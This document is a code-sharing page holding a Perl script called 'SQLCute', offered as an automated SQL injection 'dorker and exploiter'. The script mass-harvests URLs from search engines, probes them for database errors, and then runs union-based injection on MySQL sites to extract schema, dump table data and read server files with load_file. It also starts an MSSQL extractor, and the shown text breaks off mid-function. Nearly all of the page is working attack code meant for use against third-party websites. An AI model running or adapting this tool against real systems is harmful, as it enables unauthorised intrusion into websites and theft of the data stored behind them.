Posted By

madfedora on 07/24/13


Tagged

mysql mssql madfedora SQLi


Versions (?)

SQLcute


 / Published in: Perl
 

URL: http://pastebin.com/a1eXbnVr

SQL dorker and exploiter. Dorker covers up to 5 different database injectable errors. Exploiter covers 2 different types of database. The project is updated every month. Please don't rip my work, because kittens will die if you do!!!

  1. #!/usr/bin/perl
  2. =for comment
  3. *-----------------------------------------------------------*
  4. | |
  5. | SQLCute ver 1.0 |
  6. | |
  7. | Revived from a lost project |
  8. | |
  9. | [Edit] Some twat post this code on Google Code |
  10. | the project on GC was actually the incomplete WIP |
  11. | of this code. The [irony] was my original code |
  12. | got fucking removed from the SAME asshole. |
  13. | So much for fucking justice. |
  14. | |
  15. | That stolen code will never work properly b/c its |
  16. | fucking stolen. |
  17. | |
  18. *-----------------------------------------------------------*
  19. =cut
  20. use LWP::UserAgent;
  21. use HTTP::Request;
  22. use Term::ANSIColor qw(:constants);
  23.  
  24. #-----------------------------------------------------------#
  25. # Help menu #
  26. #-----------------------------------------------------------#
  27.  
  28. sub help
  29. {
  30. system('clear');
  31. system('title SQLCute 1.0');
  32. print BLUE, "[!] Usage : $0 <option>\n";
  33. print BOLD, GREEN, "\n--|| MySQL\n\n", RESET;
  34. print GREEN, " --mysqlcol MySQL column length calculator MySQL v4/5\n";
  35. print " --mysqldetails MySQL target website db global infos MySQL v4/5\n";
  36. print " --mysqlschema MySQL Full Schema Extractor MySQL v5\n";
  37. print " --mysqldump MySQL Data Dump MySQL v4/5\n";
  38. print " --mysqlfile MySQL load_file fuzzer MySQL v4/5\n";
  39. print " --mysqltblfuzz MySQL Table_name Fuzzer MySQL v4\n";
  40. print " --mysqlcolfuzz MySQL Column_name Fuzzer MySQL v4\n";
  41. print "-----------------------------------";
  42. print BOLD, GREEN, "\n--|| MsSQL\n\n",RESET;
  43. print GREEN, " --mssqldetails MsSQL DB global info\n";
  44. print " --mssqltable MsSQL Tables Extractor\n";
  45. print " --mssqlcolumns MsSQL Columns Extractor\n";
  46. print " --mssqldump MsSQL Columns Extractor\n";
  47. print "-----------------------------------";
  48. print BOLD, GREEN, "\n--|| Vulnerability Scanner\n\n", RESET;
  49. print GREEN, " --dork URL Extractor , SQL Vulnerability's Scanner & Checker\n";
  50. print "-----------------------------------";
  51. print BOLD, GREEN, "\n--|| Options\n\n", RESET;
  52. print GREEN, " --proxy define a proxy to use\n";
  53. print " --listfile List of columns or tables to use in fuzz or load_file files list\n";
  54. print " --output Save injection or scan result in an outside file\n";
  55. print " --table Table to use in dumping data or in tbles extract\n";
  56. print " --column Column to use in dumping data or in column extract\n";
  57. print " --evasion Evasive string such as %20 -- /**/ (do not include quotes)\n";
  58. print " --help Print this help manual\n";
  59. print " --readme Changes & rants...\n\n";
  60. print "-----------------------------------\n", RESET;
  61. exit();
  62. }
  63.  
  64. sub readme
  65. {
  66. system('clear');
  67. system('title SQLCute 1.0');
  68. print BOLD,RED,"[!] About\n",RESET;
  69. print GREEN,"This project was started at ",RED,"2009\n",RESET;
  70. print GREEN,"and temporary ended at ",RED,"2013\n",RESET;
  71. print GREEN,"Due to: \n",RESET;
  72. print BLUE, "-- Laziness...\n",RESET;
  73. print BLUE, "-- Out of idea\n",RESET;
  74. print BLUE, "-- Been busy\n",RESET;
  75. print BLUE, "-- Looking for help\n\n",RESET;
  76. print GREEN,"Changes were made: \n",RESET;
  77. print BLUE, "-- Mass improvements on injector\n",RESET;
  78. print BLUE, "-- More mass improves on dorker\n",RESET;
  79. print BLUE, "-- Added color UIs\n",RESET;
  80. print BLUE, "-- Fixed legacy bugs\n\n",RESET;
  81. print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n\n",RESET;
  82. exit();
  83. }
  84.  
  85. #-----------------------------------------------------------#
  86. # change variables' name below #
  87. #-----------------------------------------------------------#
  88. sub variables
  89. {
  90. my $i=0;
  91. foreach (@ARGV)
  92. {
  93. if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
  94. if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
  95. if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
  96. if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
  97. if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
  98. if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
  99. if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
  100. if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
  101. if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
  102. if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
  103. if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
  104. if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
  105. if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
  106. if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
  107. if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
  108. if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
  109. if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
  110. if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
  111. if ($ARGV[$i] eq "--help"){&help}
  112. if ($ARGV[$i] eq "--readme"){&readme}
  113. $i++;
  114. }
  115. }
  116.  
  117.  
  118.  
  119. sub main
  120. {
  121. system('clear');
  122. system('title AutoSQL Injector');
  123. print BLUE, " \n--------------------------------------\n";
  124. print YELLOW, " \n SQLCute 1.0\n";
  125. print RED," \n madfedora";
  126. print " \n mad.hatter\@gmail.com\n";
  127. print BLUE," \n--------------------------------------\n\n", RESET;
  128. if (@ARGV<1){print "[?] For Help : $0 --help\n\n" ;}
  129. }
  130.  
  131. sub vulnscanner
  132. {
  133. checksearch();
  134. search1($search_dork);
  135. search2($search_dork);
  136. }
  137. sub checksearch
  138. {
  139. #my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
  140. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=50");
  141. #-----------------------------------------------------------#
  142. # Change page numbers above #
  143. #-----------------------------------------------------------#
  144. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2');
  145. #-----------------------------------------------------------#
  146. # Add your agent of choice above #
  147. #-----------------------------------------------------------#
  148. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  149. my $response = $useragent->request($request) ;
  150. my $result = $response->content;
  151. }
  152.  
  153. sub search1
  154. {
  155. my $dork = $_[0];
  156. for ($i=0;$i<200;$i=$i+10)
  157. {
  158. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
  159. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
  160. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  161. my $response = $useragent->request($request) ;
  162. my $result = $response->content;
  163. while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
  164. {
  165. print BLUE, "[!] Dorking > $1\n", RESET;
  166. checkvuln($1)
  167. }
  168. }
  169. }
  170. sub search2
  171. {
  172. my $dork = $_[0];
  173. for ($i=0;$i<20;$i++)
  174. {
  175. my $request = HTTP::Request->new(GET => "http://us.ask.com/web?q=$dork&page=$i");
  176. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
  177. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  178. my $response = $useragent->request($request) ;
  179. my $result = $response->content;
  180. while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
  181. {
  182. my $askurl ="http://".$3 ;
  183. print BLUE, "[!] Dorking > $askurl\n",RESET;
  184. checkvuln($askurl);
  185. }
  186. }
  187. }
  188.  
  189. sub checkvuln
  190. {
  191. my $scan_url = $_[0];
  192. my $link = $scan_url.'0+order+by+9999999--';
  193. my $ua = LWP::UserAgent->new();
  194. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  195. my $req = $ua->get($link);
  196. my $fuzz = $req->content;
  197. #-----------------------------------------------------------#
  198. # MySQL #
  199. #-----------------------------------------------------------#
  200. if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)
  201.  
  202. {
  203. print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
  204. if (defined($vulnfile))
  205. {
  206. push (@mysqlvuln,"$scan_url\n");
  207. }
  208. }
  209.  
  210. elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
  211. {
  212. print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
  213. if (defined($vulnfile))
  214. {
  215. push (@mysqlvuln,"$scan_url\n");
  216. }
  217. }
  218.  
  219. elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
  220. {
  221. print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
  222. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  223. if (defined($vulnfile))
  224. {
  225. push (@mysqlvuln,"$scan_url\n");
  226. }
  227. }
  228.  
  229. elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
  230. {
  231. print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
  232. if (defined($vulnfile))
  233. {
  234. push (@mysqlvuln,"$scan_url\n");
  235. }
  236. }
  237. elsif ($fuzz =~ m/Can't get working directory/i)
  238. {
  239. print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
  240. if (defined($vulnfile))
  241. {
  242. push (@mysqlvuln,"$scan_url\n");
  243. }
  244. }
  245. elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
  246. {
  247. print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
  248. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  249. if (defined($vulnfile))
  250. {
  251. push (@mysqlvuln,"$scan_url\n");
  252. }
  253. }
  254. #-----------------------------------------------------------#
  255. # Microsoft OLE/ODBC/JET [MsSQL/Access] #
  256. #-----------------------------------------------------------#
  257. elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
  258. {
  259. print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
  260. if (defined($vulnfile))
  261. {
  262. push (@accessvuln,"$scan_url\n");
  263. }
  264. }
  265. elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
  266. {
  267. print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
  268. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  269. if (defined($vulnfile))
  270. {
  271. push (@mssqlvuln,"$scan_url\n");
  272. }
  273. }
  274. elsif ($fuzz =~ m/VBScript Runtime/i)
  275. {
  276. print BOLD, GREEN, "[!] VBScript Runtime [MsSQL] -> $scan_url\n", RESET;
  277. print BOLD, YELLOW "[*] Not Injectable\n", RESET;
  278. if (defined($vulnfile))
  279. {
  280. push (@mssqlvuln,"$scan_url\n");
  281. }
  282. }
  283. elsif ($fuzz =~ m/Microsoft JET Database/i)
  284. {
  285. print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
  286. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  287. if (defined($vulnfile))
  288. {
  289. push (@accessvuln,"$scan_url\n");
  290. }
  291. }
  292. #-----------------------------------------------------------#
  293. # ADO DB #
  294. #-----------------------------------------------------------#
  295. elsif ($fuzz =~ m/Invalid Querystring/i)
  296. {
  297. print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
  298. if (defined($vulnfile))
  299. {
  300. push (@mssqlvuln,"$scan_url\n");
  301. }
  302. }
  303. elsif ($fuzz =~ m/ADODB.Field/i)
  304. {
  305. print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
  306. if (defined($vulnfile))
  307. {
  308. push (@mssqlvuln,"$scan_url\n");
  309. }
  310. }
  311. elsif ($fuzz =~ m/ADODB.Command/i )
  312. {
  313. print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
  314. if (defined($vulnfile))
  315. {
  316. push (@mssqlvuln,"$scan_url\n");
  317. }
  318. }
  319. elsif ($fuzz =~ m/BOF or EOF/i)
  320. {
  321. print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
  322. if (defined($vulnfile))
  323. {
  324. push (@mssqlvuln,"$scan_url\n");
  325. }
  326. }
  327. #-----------------------------------------------------------#
  328. # PostgreSQL #
  329. #-----------------------------------------------------------#
  330. elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
  331. {
  332. print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
  333. if (defined($vulnfile))
  334. {
  335. push (@mssqlvuln,"$scan_url\n");
  336. }
  337. }
  338. #-----------------------------------------------------------#
  339. # Oracle #
  340. #-----------------------------------------------------------#
  341. elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
  342. {
  343. print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
  344. if (defined($vulnfile))
  345. {
  346. push (@mssqlvuln,"$scan_url\n");
  347. }
  348. }
  349. #-----------------------------------------------------------#
  350. # Sybase #
  351. #-----------------------------------------------------------#
  352. elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
  353. {
  354. print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
  355. if (defined($vulnfile))
  356. {
  357. push (@mssqlvuln,"$scan_url\n");
  358. }
  359. }
  360. }
  361. #-----------------------------------------------------------#
  362. # Below here is injector #
  363. #-----------------------------------------------------------#
  364.  
  365. sub mysqlcount
  366. {
  367. my $site = $_[0];
  368. my $ev = $_[1];
  369. my $null = "09'+and+1=" ;
  370. my $code = "0+union+select+" ;
  371. if ($ev eq '/*')
  372. {$add = "/**/" ; $com = "/*";}
  373. elsif ($ev eq '%20')
  374. {$add = "%20" ; $com = "%00" ;}
  375. else
  376. {$add = '+' ; $com ='--';}
  377. my $injection = $site.$null.$code."0",$com ;
  378. my $useragent = LWP::UserAgent->new();
  379. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  380. my $response = $useragent->get($injection);
  381. my $result = $response->content;
  382. if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/supplied argument is not a valid MySQL/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
  383. {
  384. print BOLD, GREEN, "\n[!] This Website Is Vulnerable\n", RESET ;
  385. print GREEN,"[+] Working On It\n",RESET;
  386. }
  387. else
  388. {
  389. print BOLD, YELLOW, "\n[!] This WebSite Is Not Vulnerable !\n", RESET;
  390. exit();
  391. }
  392. for ($i = 0 ; $i < 100 ; $i ++)
  393. {
  394. $col.=','.$i;
  395. $specialword.=','."0x7075707079";
  396. if ($i == 0)
  397. {
  398. $specialword = '' ;
  399. $col = '' ;
  400. }
  401. $sql=$site.$null.$code."0x7075707079".$specialword.$com ;
  402. $ua = LWP::UserAgent->new();
  403. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  404. $rq = $ua->get($sql);
  405. $response = $rq->content;
  406. if($response =~ /sqlcute/)
  407. {
  408. $i ++;
  409. print "\n[!] SQL Column Count Finished\n" ;
  410. print BOLD, GREEN, "[!] This WebSite Have $i Columns\n",RESET;
  411. $sql=$site.$null.$code."0".$col.$com ;
  412. print "=> ".$sql ."\n\n";
  413. if (defined($vulnfile))
  414. {
  415. open(vuln_file,">>$vulnfile") ;
  416. print vuln_file "Target Host : $site\n";
  417. print vuln_file "Evasion : $ev\n";
  418. print vuln_file "Col length : $i\n";
  419. print vuln_file "Injection : $sql\n";
  420. close(vuln_file);
  421. print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
  422. }
  423. exit () ;
  424. }
  425. }
  426. }
  427.  
  428. sub mysqldetails
  429. {
  430. my $site = $_[0];
  431. my $ev = $_[1];
  432. if ($ev eq '/*')
  433. {$add = "/**/" ; $com = "/*";}
  434. elsif ($ev eq '%20')
  435. {$add = "%20" ; $com = "%00" ;}
  436. else
  437. {$add = '+' ; $com ='--';}
  438. my $selection = "concat(0x7075707079,version(),0x7075707079,database(),0x7075707079,user(),0x7075707079)";
  439. print YELLOW,"\n[+] Info Getting, Started Please Wait!\n\n",RESET;
  440. if ($site =~ /(.*)NullArea(.*)/i)
  441. {
  442. my $newlink = $1.$selection.$2.$com;
  443. my $ua = LWP::UserAgent->new();
  444. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  445. my $request = $ua->get($newlink);
  446. my $content = $request->content;
  447. if ($content =~ /sqlcute(.*)sqlcute(.*)sqlcute(.*)sqlcute/)
  448. {
  449. print GREEN,"[!] Database Version : $1\n";
  450. print "[!] Database Name : $2\n";
  451. print "[!] DB UserName : $3\n",RESET;
  452. if (defined($vulnfile))
  453. {
  454. open(vuln_file,">>$vulnfile") ;
  455. print vuln_file "[!] Target : $site\n";
  456. print vuln_file "[!] evasion : $ev\n";
  457. print vuln_file "[!] Database Version : $1\n";
  458. print vuln_file "[!] Database Name : $2\n";
  459. print vuln_file "[!] DB UserName : $3\n";
  460. close(vuln_file);
  461. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  462. }
  463. exit () ;
  464. }
  465. else
  466. {
  467. print BOLD,BRIGHT_RED,"[!] Failed\n",RESET;
  468. exit () ;
  469. }
  470. }
  471. else
  472. {
  473. print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  474. exit () ;
  475. }
  476. }
  477.  
  478. sub mysqlschema
  479. {
  480. my $site = $_[0];
  481. my $ev = $_[1];
  482. my @schema=();
  483. if ($ev eq '/*')
  484. {$add = "/**/" ; $com = "/*";}
  485. elsif ($ev eq '%20')
  486. {$add = "%20" ; $com = "%00" ;}
  487. else
  488. {$add = '+' ; $com ='--';}
  489. my $selection = "concat(0x7075707079,column_name,0x7075707079,table_name,0x7075707079,table_schema,0x7075707079)";
  490. print GREEN,"\n[+] Schema Extracting, Started Please Wait!\n\n",RESET;
  491. if ($site =~ /(.*)NullArea(.*)/i)
  492. {
  493. print GREEN,"[+] Column :|: Table :|: Database\n",RESET;
  494. for ($i=0; $i<=1000 ; $i++ )
  495. {
  496. $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
  497. my $ua = LWP::UserAgent->new();
  498. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  499. my $request = $ua->get($newstring);
  500. my $content = $request->content;
  501. if ($content =~ /sqlcute(.*)sqlcute(.*)sqlcute(.*)sqlcute/)
  502. {
  503. print "[!] $1 :|: $2 :|: $3 \n";
  504. push (@schema,"$1 :|: $2 :|: $3 \n");
  505. }
  506. }
  507. if (defined($vulnfile))
  508. {
  509. open(vuln_file,">>$vulnfile") ;
  510. print vuln_file "[!] Target : $site\n";
  511. print vuln_file "[!] evasion : $ev\n";
  512. print vuln_file "[!] Schema :: ---- \n\n\n";
  513. $i=0;
  514. foreach(@schema)
  515. {
  516. print vuln_file $schema[$i]."\n";
  517. $i++;
  518. }
  519. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  520. }
  521. }
  522. else
  523. {
  524. print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  525. exit () ;
  526. }
  527. }
  528.  
  529. sub mysqldump
  530. {
  531. my $site = $_[0];
  532. my $colm = $_[1];
  533. my $tble = $_[2];
  534. my $ev = $_[3];
  535. print GREEN,"[+] Table name $tble\n";
  536. print "[+] Column name $colm\n",RESET;
  537. my @dumper=();
  538. if ($ev eq '/*')
  539. {$add = "/**/" ; $com = "/*";}
  540. elsif ($ev eq '%20')
  541. {$add = "%20" ; $com = "%00" ;}
  542. else
  543. {$add = '+' ; $com ='--';}
  544. my $selection = "concat(0x7075707079,$colm,0x7075707079)";
  545. print GREEN,"\n[+] Data Dump Started Please Wait!\n\n",RESET;
  546. if ($site =~ /(.*)NullArea(.*)/i)
  547. {
  548. $i=0;
  549. print GREEN,"[+] Dumped Data : \n",RESET;
  550. do
  551. {
  552. $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;
  553. my $ua = LWP::UserAgent->new();
  554. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  555. my $request = $ua->get($newstring);
  556. my $content = $request->content;
  557. if ($content =~ /sqlcute(.*)sqlcute/)
  558. {
  559. print "[!] $1 \n";
  560. push(@dumper,"$1\n");
  561. }
  562. $i++;
  563. }
  564. while ($i<1500);
  565. if (defined($vulnfile))
  566. {
  567. open(vuln_file,">>$vulnfile") ;
  568. print vuln_file "[!] Target : $site\n";
  569. print vuln_file "[!] evasion : $ev\n";
  570. print vuln_file "[!] Dumped Column : $colm\n";
  571. print vuln_file "[!] Dumped Table : $tble\n";
  572. print vuln_file "[!] Data :: ---- \n\n\n";
  573. $i=0;
  574. foreach(@dumper)
  575. {
  576. print vuln_file $dumper[$i]."\n";
  577. $i++;
  578. }
  579. close(vuln_file);
  580. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  581. }
  582. }
  583. else
  584. {
  585. print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  586. exit () ;
  587. }
  588. }
  589.  
  590. sub mysqlfuzztable
  591. {
  592. my $site = $_[0];
  593. my $ev = $_[1];
  594. my $filelst = $_[2];
  595. print GREEN,"[+] File List $filelst\n",RESET;
  596. my @tbles_possible=();
  597. if ($ev eq '/*')
  598. {$add = "/**/" ; $com = "/*";}
  599. elsif ($ev eq '%20')
  600. {$add = "%20" ; $com = "%00" ;}
  601. else
  602. {$add = '+' ; $com ='--';}
  603. open (word_list_file,"$filelst") or die BOLD,YELLOW,"[!] Couldn't Open WordList File $!\n",RESET;
  604. @word_list_search = <word_list_file> ;
  605. print GREEN,"\n[+] Fuzzing Table, Started Please Wait!\n\n",RESET;
  606. if ($site =~ /(.*)NullArea(.*)/i)
  607. {
  608. print GREEN,"[+] Fuzz Result : \n\n",RESET;
  609. $i=0;
  610. foreach (@word_list_search)
  611. {
  612. print GREEN,"[!] Trying To Fuzz Table_name with $word_list_search[$i]",RESET;
  613. $newstring = $1."0x7075707079".$2.$add.'from'.$add.$word_list_search[$i].$com;
  614. my $ua = LWP::UserAgent->new();
  615. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  616. my $request = $ua->get($newstring);
  617. my $content = $request->content;
  618. if ($content =~ /sqlcute/)
  619. {
  620. print BOLD,GREEN,"\n[!] Found Table ! $word_list_search[$i] \n",RESET;
  621. push(@tbles_possible,"$word_list_search[$i]\n");
  622. }
  623. $i++;
  624. }
  625. if (defined($vulnfile))
  626. {
  627. open(vuln_file,">>$vulnfile") ;
  628. print vuln_file "[!] Target : $site\n";
  629. print vuln_file "[!] evasion : $ev\n";
  630. print vuln_file "[!] Wordlist : $filelst\n";
  631. print vuln_file "[!] Tbles Found :: ---- \n\n\n";
  632. $i=0;
  633. foreach(@tbles_possible)
  634. {
  635. print vuln_file $tbles_possible[$i]."\n";
  636. $i++;
  637. }
  638. close(vuln_file);
  639. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  640. }
  641. }
  642. else
  643. {
  644. print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  645. exit () ;
  646. }
  647. }
  648.  
  649. sub mysqlfuzzcolumn
  650. {
  651. my $site = $_[0];
  652. my $ev = $_[1];
  653. my $filelst = $_[2];
  654. my $tablext = $_[3];
  655. print GREEN,"[+] File List $filelst\n";
  656. print GREEN"[+] Table To Fuzz Columns $tablext\n",RESET;
  657. my @cols_possible=();
  658. if ($ev eq '/*')
  659. {$add = "/**/" ; $com = "/*";}
  660. elsif ($ev eq '%20')
  661. {$add = "%20" ; $com = "%00" ;}
  662. else
  663. {$add = '+' ; $com ='--';}
  664. open (word_list_file,"$filelst") or die RED,"[!] Couldnt Open WordList File $!\n",RESET;
  665. @word_list_search = <word_list_file> ;
  666. print GREEN,"\n[+] Fuzzing Column, Started Please Wait!\n\n",RESET;
  667. if ($site =~ /(.*)NullArea(.*)/i)
  668. {
  669. print GREEN,"[+] Fuzz Result : \n\n",RESET;
  670. $i=0;
  671. foreach (@word_list_search)
  672. {
  673. print GREEN,"[!] Trying To Fuzz Column_name with $word_list_search[$i]",RESET;
  674. $newstring = $1."concat(0x7075707079,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;
  675. my $ua = LWP::UserAgent->new();
  676. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  677. my $request = $ua->get($newstring);
  678. my $content = $request->content;
  679. if ($content =~ /sqlcute/)
  680. {
  681. print GREEN,"\n[!] File Column ! $word_list_search[$i] \n",RESET;
  682. push(@cols_possible,"$word_list_search[$i]\n");
  683. }
  684. $i++;
  685. }
  686. if (defined($vulnfile))
  687. {
  688. open(vuln_file,">>$vulnfile") ;
  689. print vuln_file "[!] Target : $site\n";
  690. print vuln_file "[!] evasion : $ev\n";
  691. print vuln_file "[!] Wordlist : $filelst\n";
  692. print vuln_file "[!] Cols Found :: ---- \n\n\n";
  693. $i=0;
  694. foreach(@cols_possible)
  695. {
  696. print vuln_file $cols_possible[$i]."\n";
  697. $i++;
  698. }
  699. close(vuln_file);
  700. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  701. }
  702. }
  703. else
  704. {
  705. print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  706. exit () ;
  707. }
  708. }
  709.  
  710. sub mysqlfile
  711. {
  712. my $site = $_[0];
  713. my $ev = $_[1];
  714. my $filelst = $_[2];
  715. print "[+] File List $filelst\n";
  716. my @cols_possible=();
  717. if ($ev eq '/*')
  718. {$add = "/**/" ; $com = "/*";}
  719. elsif ($ev eq '%20')
  720. {$add = "%20" ; $com = "%00" ;}
  721. else
  722. {$add = '+' ; $com ='--';}
  723. open (word_list_file,"$filelst") or die RED,"[!] Couldnt Open WordList File $!\n",RESET;
  724. @word_list_search = <word_list_file> ;
  725. print GREEN, "\n[+] File Fuzz, Started Please Wait!\n\n",RESET;
  726. if ($site =~ /(.*)NullArea(.*)/i)
  727. {
  728. print GREEN, "[+] Fuzz Result : \n\n",RESET;
  729. $i=0;
  730. foreach (@word_list_search)
  731. {
  732. $newstring = $1."concat(0x7075707079,load_file('$word_list_search[$i]'))".$2.$com;
  733. my $ua = LWP::UserAgent->new();
  734. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  735. my $request = $ua->get($newstring);
  736. my $content = $request->content;
  737. print GREEN, "[!] Trying To Fuzz Load_File with $word_list_search[$i]",RESET;
  738. if ($content =~ m/az88pix00q/i)
  739. {
  740. print GREEN, "\n[!] Found File ! $word_list_search[$i] \n",RESET;
  741. push(@cols_possible,"$word_list_search[$i]\n");
  742. }
  743. $i++;
  744. }
  745. if (defined($vulnfile))
  746. {
  747. open(vuln_file,">>$vulnfile") ;
  748. print vuln_file "[!] Target : $site\n";
  749. print vuln_file "[!] evasion : $ev\n";
  750. print vuln_file "[!] Wordlist : $filelst\n";
  751. print vuln_file "[!] Files Found :: ---- \n\n\n";
  752. $i=0;
  753. foreach(@cols_possible)
  754. {
  755. print vuln_file $cols_possible[$i]."\n";
  756. $i++;
  757. }
  758. close(vuln_file);
  759. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  760. }
  761. }
  762. else
  763. {
  764. print BOLD, YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
  765. exit () ;
  766. }
  767. }
  768.  
  769. sub mssqldetails
  770. {
  771. my $site = $_[0];
  772. my $ev = $_[1];
  773. if ($ev eq '/*')
  774. {$add = "/**/" ; $com = "/*";}
  775. elsif ($ev eq '%20')
  776. {$add = "%20" ; $com = "%00" ;}
  777. else
  778. {$add = '+' ; $com ='--';}
  779. print GREEN,"\n[+] Getting Infos, Started Please Wait!\n\n",RESET;
  780. $version = "convert(int,(select".$add."\@\@version));--" ;
